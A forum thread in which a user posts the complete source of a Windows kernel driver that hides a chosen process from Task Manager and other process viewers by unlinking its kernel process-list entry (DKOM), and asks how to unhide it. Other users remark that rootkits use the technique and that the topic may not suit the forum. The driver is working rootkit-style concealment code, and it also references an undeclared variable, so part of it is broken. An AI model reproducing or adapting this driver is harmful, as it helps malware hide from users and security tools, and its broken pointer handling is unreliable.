Jump to content

unhide hidden process

nanoiton
 Share

Recommended Posts

nanoiton Seeker

nanoiton

Posted
Posted

i made a utility to completely hide a process from from the process list of any application (including task manager, procexp, procx, fexplorer, etc..) by using DKOM. my problem is how to unhide the process without restarting the application. help me plzzz..

Link to comment
Share on other sites
nanoiton Seeker

nanoiton

Posted
  • Author
Posted

not only the window but the process from any application. d only problem is that once hidden the application cannot detect itself and some self-referencing functions won't run. heres the code of the driver:

#include <ntddk.h>
#include <ntifs.h>

typedef unsigned int UINT;
typedef int BOOL;

typedef struct _hpstruct{
    UINT uPid;
    UINT uFlinkOffset;
}hpstruct;

NTSTATUS DriverEntry(PDRIVER_OBJECT pDriverObject, PUNICODE_STRING pRegistryPath);
NTSTATUS HideProc_Create(PDEVICE_OBJECT DeviceObject, PIRP Irp);
NTSTATUS HideProc_Write(PDEVICE_OBJECT DeviceObject, PIRP Irp);
NTSTATUS HideProc_Close(PDEVICE_OBJECT DeviceObject, PIRP Irp);
VOID HideProc_Unload(PDRIVER_OBJECT  DriverObject);
NTSTATUS HideProc_Unsupported(PDEVICE_OBJECT DeviceObject, PIRP Irp);

#pragma alloc_text(INIT, DriverEntry)
#pragma alloc_text(PAGE, HideProc_Create) 
#pragma alloc_text(PAGE, HideProc_Write)
#pragma alloc_text(PAGE, HideProc_Close) 
#pragma alloc_text(PAGE, HideProc_Unload)
#pragma alloc_text(PAGE, HideProc_Unsupported)


NTSTATUS DriverEntry(PDRIVER_OBJECT pDriverObject, PUNICODE_STRING pRegistryPath){
    UNICODE_STRING usDriverName, usDosDeviceName;
    PDEVICE_OBJECT pDeviceObject;
    NTSTATUS ntStatus;
    UINT uiIndex;
    
    DbgPrint("HideProc DriverEntry Called\n");
    
    RtlInitUnicodeString(&usDriverName, L"\\Device\\HideProc");
    RtlInitUnicodeString(&usDosDeviceName, L"\\DosDevices\\HideProc"); 
    
    ntStatus = IoCreateDevice(pDriverObject, 0, &usDriverName, FILE_DEVICE_UNKNOWN, FILE_DEVICE_SECURE_OPEN, FALSE, &pDeviceObject);
    if(NT_SUCCESS(ntStatus)){
        for(uiIndex = 0; uiIndex < IRP_MJ_MAXIMUM_FUNCTION; uiIndex++)
            pDriverObject->MajorFunction[uiIndex]   = HideProc_Unsupported;
        pDriverObject->MajorFunction[IRP_MJ_CREATE] = HideProc_Create;
        pDriverObject->MajorFunction[IRP_MJ_WRITE]  = HideProc_Write;
        pDriverObject->MajorFunction[IRP_MJ_CLOSE]  = HideProc_Close;
        pDriverObject->DriverUnload         = HideProc_Unload; 
        pDeviceObject->Flags |= DO_DIRECT_IO;
        pDeviceObject->Flags &= (~DO_DEVICE_INITIALIZING);
        IoCreateSymbolicLink(&usDosDeviceName, &usDriverName);
    }
    
    return ntStatus;
}

NTSTATUS HideProc_Create(PDEVICE_OBJECT DeviceObject, PIRP Irp){
    NTSTATUS NtStatus = STATUS_SUCCESS;
    DbgPrint("HideProc_Create Called\n");
    return NtStatus;
}

NTSTATUS HideProc_Write(PDEVICE_OBJECT DeviceObject, PIRP Irp){
    NTSTATUS NtStatus = STATUS_INVALID_PARAMETER;
    PIO_STACK_LOCATION pIoStackIrp = NULL;
    UINT dwDataWritten = 0;
    ULONG dwEProcAddr;
    PLIST_ENTRY pListProcs;
    PEPROCESS pEProc;
    
    hpstruct *hps;
    
    DbgPrint("HideProc_Write Called\n");
    pIoStackIrp = IoGetCurrentIrpStackLocation(Irp);
    
    if(pIoStackIrp && Irp->MdlAddress){
        hps = (hpstruct *)MmGetSystemAddressForMdlSafe(Irp->MdlAddress, NormalPagePriority);
        if(hps){
            if(pIoStackIrp->Parameters.Write.Length == sizeof(hpstruct)){
                if(PsLookupProcessByProcessId((PVOID)hps->uPid, &pEProc) == STATUS_SUCCESS){
                    dwEProcAddr = (ULONG) pEProc;
                    __try{
                        pListProcs = (PLIST_ENTRY) (dwEProcAddr + hps->uFlinkOffset);
                        *((ULONG*) pListProcs->Blink) = (ULONG) (pListProcs->Flink);   //set flink of prev proc to flink of cur proc
                        *((ULONG*) pListProcs->Flink+1) = (ULONG) (pListProcs->Blink); //set blink of next proc to blink of cur proc
                        pListProcs->Flink = (PLIST_ENTRY) &(pListProcs->Flink); //set flink and blink of cur proc to themselves
                        pListProcs->Blink = (PLIST_ENTRY) &(pListProcs->Flink); //otherwise might bsod when exiting process
                        plist_active_procs->Flink = (LIST_ENTRY *) &(plist_active_procs->Flink);
                        plist_active_procs->Blink = (LIST_ENTRY *) &(plist_active_procs->Flink);

                    }__except(EXCEPTION_EXECUTE_HANDLER){
                        NtStatus = GetExceptionCode();
                        DbgPrint("Exception: %d.\n", NtStatus);
                    }
                    NtStatus = STATUS_SUCCESS;
                }
            }else{
                NtStatus = STATUS_BUFFER_TOO_SMALL;
            }
            dwDataWritten = sizeof(hpstruct);
        }
    }
    
    Irp->IoStatus.Status = NtStatus;
    Irp->IoStatus.Information = dwDataWritten;
    IoCompleteRequest(Irp, IO_NO_INCREMENT);
    return NtStatus;
}

NTSTATUS HideProc_Close(PDEVICE_OBJECT DeviceObject, PIRP Irp){
    NTSTATUS NtStatus = STATUS_SUCCESS;
    DbgPrint("HideProc_Close Called\n");
    return NtStatus;
}

VOID HideProc_Unload(PDRIVER_OBJECT  DriverObject){
    UNICODE_STRING usDosDeviceName;
    DbgPrint("HideProc_Unload Called\n");
    RtlInitUnicodeString(&usDosDeviceName, L"\\DosDevices\\HideProc");
    IoDeleteSymbolicLink(&usDosDeviceName);
    IoDeleteDevice(DriverObject->DeviceObject);
}

NTSTATUS HideProc_Unsupported(PDEVICE_OBJECT DeviceObject, PIRP Irp){
    NTSTATUS NtStatus = STATUS_NOT_SUPPORTED;
    DbgPrint("HideProc_Unsupported Called\n");
    return NtStatus;
}
Link to comment
Share on other sites
PsaltyDS Universalist

PsaltyDS

Posted
Posted

...only problem is that once hidden the application cannot detect itself and some self-referencing functions won't run.

Oh, the irony... :rolleyes:

heres the code of the driver:

That looks a lot like C++ code. This is an AutoIt scripting forum. In addition, hiding running processes may not be considered an acceptable topic in this forum...

:rambo:

Valuater's AutoIt 1-2-3, Class... Is now in Session!For those who want somebody to write the script for them: RentACoder"Any technology distinguishable from magic is insufficiently advanced." -- Geek's corollary to Clarke's law
Link to comment
Share on other sites
SkinnyWhiteGuy Universalist

SkinnyWhiteGuy

Posted
Posted

I did some research, and the DKOM method is often used by rootkits to hide themselves, but, that's just shows that something that could be used for good (hiding your Virus scanner, or a file copier that you don't want interrupted) is used for something evil. Anyway, enough of me making excuses.

Since this technique is used by rootkits, you'd probably need to use methods to detect rootkits to find the process, and then see if you could add it back to the process list. I know in my mind how it should work, just can't code anything like that myself.

Link to comment
Share on other sites
i542 Universalist

i542

Posted
Posted

@Fuzzy Penguin: Yep, it is C++ code. Nice to study on :rambo:

ok, now, back on topic... if you want help on C++ code, don't ask me, I have no idea on it. try on C++ forums or post in Chat, for other geeks to study it :rolleyes:

I can do signature me.

Link to comment
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
 Share
Go to topic listing

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...